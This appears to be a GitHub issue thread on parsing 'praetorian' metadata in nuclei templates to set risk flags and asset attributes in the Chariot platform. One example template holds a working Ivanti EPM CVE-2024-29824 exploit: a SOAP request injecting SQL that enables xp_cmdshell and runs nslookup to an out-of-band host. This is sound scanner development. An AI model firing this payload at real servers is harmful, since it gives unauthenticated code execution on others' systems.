Risk Assessment and Attribute Management through Nuclei Template Metadata Processing

[aashish-sec]

Hi team, Requesting processing of metadata from nuclei templates that would enable us to create attributes from them and assess whether a template poses a material risk. The feature should check the praetorian node within the metadata node of the nuclei templates. Specifically, if a template is flagged with risk set to false, it should not be treated as a risk. Instead, it should contribute attributes to the impacted asset based on the data from the nuclei template. This functionality will aid in better risk categorization and the effective display of attributes on our platform.

Implement a mechanism within the nuclei template processing to:

• Check for a "risk" flag under the praetorian node in the metadata.
• If the "risk" value is false, we'll not display the item under the risk tab in Chariot.
• We'll extract values from metadata -> praetorian -> attributes (key-value pairs) and treat each of these as an attribute to be displayed on the platform. This would be done regardless of whether the risk: is true or false.

Example

Here is an example of a nuclei template that includes a praetorian node with risk set to false and attributes defined:

info:
  name: Exposed Fluent Bit Monitoring API
  author: Aashish Malhotra
  severity: medium
  description: Detect publicly exposed Fluent Bit monitoring API endpoints.
  tags: case-reviewed
  metadata:
    praetorian:
      risk: false
      attributes:
        cpe: some_cpe_label
        technology: fluentbit

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/metrics/prometheus"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "fluentbit_"
        part: body
      - type: status
        status:
          - 200

In the above template, since the risk is false, we'll not display this under the risks tab, but simply tag the asset impacted with two attributes - cpe: some_cpe_label and technology: fluentbit

Similarly, another example of a nuclei template that includes a praetorian node with risk set to false and attributes defined:

id: CVE-2024-29824
info:
  name: Ivanti EPM - Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: 'An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

    '
  reference:
  - https://github.com/horizon3ai/CVE-2024-29824
  - https://nvd.nist.gov/vuln/detail/CVE-2024-29824
  - https://forums.ivanti.com/s/article/Security-Advisory-May-2024
  - https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/
  classification:
    cve-id: CVE-2024-29824
  metadata:
    max-request: 1
    praetorian:
      risk: true
      attributes:
        cpe: some_cpe_label
        technology: Ivanti EPM

  tags: cve,cve2024,ivanti,epm,sqli,rce,case-reviewed
http:
- raw:
  - "POST /WSStatusEvents/EventHandler.asmx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap12:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap12=\"http://www.w3.org/2003/05/soap-envelope\">\n  <soap12:Body>\n    <UpdateStatusEvents xmlns=\"http://tempuri.org/\">\n      <deviceID>string</deviceID>\n      <actions>\n        <Action name=\"string\" code=\"0\" date=\"0\" type=\"96\" user=\"string\" configguid=\"string\" location=\"string\">\n          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--</status>\n        </Action>\n      </actions>\n    </UpdateStatusEvents>\n  </soap12:Body>\n</soap12:Envelope>\n"
  matchers-condition: and
  matchers:
  - type: word
    part: content_type
    words:
    - application/soap+xml
  - type: word
    part: body
    words:
    - UpdateStatusEventsResponse
  - type: word
    part: interactsh_protocol
    words:
    - dns
  - type: status
    status:
    - 200

In the above template, since the risk is true, we'll display this under the risks tab, and also tag the asset impacted with the attributes - cpe: some_cpe_label and technology: Ivanti EPM

[privateducky]

@aashish-sec very elegant suggestion (thanks for the examples - makes it very clear).

this is an area we've talked about before but hadn't settled on an option (right now, things like this just fall into info risks). but I like the template-based approach you're showing here.

we'll talk about it internally this week and I'll update here.

[UNC1739]

I took an initial stab at implementing this here: https://github.com/praetorian-inc/chaos/pull/893

[UNC1739]

I just finished up testing and verified the PR works properly so it's ready for review

[privateducky]

Solution is merged; will go out in the next deployment.

[noah-tutt-praetorian]

fyi @aashish-sec - we renamed the risk field to detection and inverted the logic in the code to better take advantage of default initialization. The flow as implemented is:

• Check for a detection flag under the praetorian node in the metadata.
• If the detection value is true, do not produce a risk.

[aashish-sec]

Thanks a lot, @privateducky @UNC1739 @noah-tutt-praetorian!